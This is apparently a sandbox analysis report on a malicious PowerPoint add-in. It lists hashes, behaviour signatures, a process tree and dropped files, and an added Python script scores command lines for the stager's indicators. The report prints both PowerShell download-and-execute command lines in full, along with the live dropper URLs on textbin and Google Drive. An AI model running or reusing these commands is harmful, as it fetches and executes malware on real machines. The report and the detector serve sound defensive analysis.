Analysis

  • max time kernel
    61s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-11-2024 16:00

General

  • Target

    16ed82c39631c064df6e4790a55f9c766ba6747307c864eed489204dac021497.ppam

  • Size

    7KB

  • MD5

    51b6a6b674b708af7d355f5b855f1f28

  • SHA1

    427f1a1ffb6235dbc91a8bb2ab7e0e89f1d669b5

  • SHA256

    16ed82c39631c064df6e4790a55f9c766ba6747307c864eed489204dac021497

  • SHA512

    dd5d7fc3940d8e1a783373b10a8595a364becfe7650a6f3f32e6b871dca1ee5623db6cb8d4b9b871c0a6ec1b47176860574af6333ccf1fdcf769041feea871af

  • SSDEEP

    192:xrXP/3GViyiM8+5byn/nKM5TYgcnHyvakYSq3YD:dXPuE+ann5TRs/Z3K

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pt.textbin.net/download/itm1dkgz7c

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Uses powershell.exe to run commands.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\16ed82c39631c064df6e4790a55f9c766ba6747307c864eed489204dac021497.ppam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2184
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/itm1dkgz7c' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.vbs -force ;wscript.exe x.vbs ; exit
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\system32\wscript.exe" x.vbs
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2408
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
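The two PowerShell command lines above (PIDs 2728 and 2688) are the whole stager. The first disables TLS certificate validation, fetches a URL from pt.textbin.net, fetches the VBScript that URL points to, writes it to x.vbs in the temp directory and runs it with wscript.exe. The second pulls x.pptx from Google Drive into the same directory and opens it, apparently as a decoy. The Python below is an added triage example, not part of this sandbox report or of the sample: it scores process command lines against exactly those indicators, using the two command lines from this report plus one constructed benign invocation as sample input. The indicator weights, the verdict threshold and the list of "legitimate hosting" domains are the editor's assumptions, seeded from the two domains seen here.

```python
import re
from urllib.parse import urlparse

# Sample input: the two powershell.exe command lines recorded in the process tree
# above (PIDs 2728 and 2688), plus one CONSTRUCTED benign invocation for contrast.
SAMPLE_CMDLINES = [
    "powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;"
    "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;"
    "$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;"
    "$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/itm1dkgz7c' ) ;"
    "$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;"
    "$uNTnd | Out-File -FilePath x.vbs -force ;wscript.exe x.vbs ; exit",
    "powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;"
    "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;"
    "$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;"
    "$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', "
    "[System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit",
    # constructed benign admin command, not from the report
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\Admin\Documents | Measure-Object",
]

# Indicator name -> (weight, regex). Weights are assumptions chosen for this example.
INDICATORS = {
    "tls_validation_disabled": (3, re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    "webclient_created":       (1, re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I)),
    "download_call":           (1, re.compile(r"\.Download(String|File)\s*\(", re.I)),
    "temp_dir_used":           (1, re.compile(r"GetTempPath\(\)", re.I)),
    "vbs_dropped":             (3, re.compile(r"Out-File\s+-FilePath\s+\S+\.vbs", re.I)),
    "wscript_spawn":           (3, re.compile(r"\bwscript\.exe\b", re.I)),
    # DownloadString on a variable: the first download returned the URL of the next stage
    "second_stage_url_fetched": (2, re.compile(r"DownloadString\(\s*\$\w+\s*\)", re.I)),
    "decoy_document_opened":   (2, re.compile(r"\bstart\s+\S+\.pptx\b", re.I)),
}

# Assumed list of legitimate hosting services abused as download sources,
# seeded from the two domains in this report.
ABUSED_HOSTING_DOMAINS = ("drive.google.com", "textbin.net")
LEGIT_HOSTING_WEIGHT = 2
MALICIOUS_THRESHOLD = 6  # assumption: tune against your own telemetry

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def extract_urls(cmdline):
    """Return every http(s) URL literal in the command line, in order."""
    return URL_RE.findall(cmdline)


def abused_hosts(urls):
    """Hosts from `urls` that sit on (or under) a known abused hosting domain."""
    hits = []
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        for dom in ABUSED_HOSTING_DOMAINS:
            if host == dom or host.endswith("." + dom):
                hits.append(host)
                break
    return hits


def analyze(cmdline):
    """Score one process command line against the stager indicators."""
    matched = [name for name, (_, rx) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[name][0] for name in matched)
    urls = extract_urls(cmdline)
    hosts = abused_hosts(urls)
    if hosts:
        score += LEGIT_HOSTING_WEIGHT
    return {
        "indicators": matched,
        "urls": urls,
        "abused_hosts": hosts,
        "score": score,
        "verdict": "malicious-stager" if score >= MALICIOUS_THRESHOLD else "benign",
    }


def triage(cmdlines):
    """Analyze a batch of command lines (e.g. Sysmon EID 1 or 4688 records)."""
    return [analyze(c) for c in cmdlines]


if __name__ == "__main__":
    for cmd, result in zip(SAMPLE_CMDLINES, triage(SAMPLE_CMDLINES)):
        print(f"{result['verdict']:16} score={result['score']:2} "
              f"indicators={result['indicators']} hosts={result['abused_hosts']}")
```

The point of scoring rather than matching a single string is that the stager's variable names ($UmniN, $uNTnd) and URLs are trivially rotated between campaigns, while the combination of a certificate-validation bypass, a WebClient download into the temp directory, a dropped .vbs and a wscript.exe launch is the behaviour the first process actually needs to succeed.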

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\x.vbs

      Filesize

      796B

      MD5

      b75621ae1faee608b4ed39e971d709a5

      SHA1

      bcd528eb22d2e7b1d11c9b603df87cec37d23da5

      SHA256

      54ce5e89f7c67db8cef4954d8f041857474882dc6af675b4120833bb8832a3a5

      SHA512

      5ef0841caeae364fee32cdd561c7473c45244009ae6dc73f38eefffdb1e95f7cb6f0531ef5d273ca7dd28f408c40a93a3de3c619dab41a0953ab731167ec0e66

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\21A56D1RTEBT417LRS9K.temp

      Filesize

      7KB

      MD5

      5f91436e32a1577e0351d7d389ffa4f6

      SHA1

      f2c81ffac236179fb998de44a65e5684534cbe2e

      SHA256

      0a138a85fad9c2b0d744a8f8a997b67da55fc6e702d80974710fc5520fb27ee1

      SHA512

      6cea8890a421c583a271d4da7c7c279898f3be9f6c58df61aa3aa5508c1274b08e8ddba8cb3c0b3ed6b077f45182987cc0ce841039c488760e237168097e69e8

    • memory/1936-4-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-8-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-6-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-5-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-9-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-2-0x000000007408D000-0x0000000074098000-memory.dmp

      Filesize

      44KB

    • memory/1936-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1936-0-0x000000002D921000-0x000000002D922000-memory.dmp

      Filesize

      4KB

    • memory/1936-11-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1936-21-0x000000007408D000-0x0000000074098000-memory.dmp

      Filesize

      44KB

    • memory/1936-22-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2688-23-0x00000000068E0000-0x000000000739A000-memory.dmp

      Filesize

      10.7MB